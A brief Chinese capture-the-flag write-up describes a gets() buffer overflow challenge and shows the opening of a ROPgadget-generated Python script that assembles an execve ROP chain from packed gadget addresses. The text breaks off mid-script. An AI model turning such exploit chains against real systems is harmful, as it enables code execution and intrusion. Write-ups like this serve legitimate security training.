这道题的设置是比较简单的，一个显而易见的gets()overflow，但是找不到pop rdi，又不能让自己受着，请出ROPgadget大人杀死比赛。 ROPgadget --bianry rop --ropchain 在cpu的一阵运算下得到了这个： #!/usr/bin/env python3 # execve generated by ROPgadget from struct import pack # Padding goes here p = b'' p += pack('<I', 0x0806ecda) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p +=...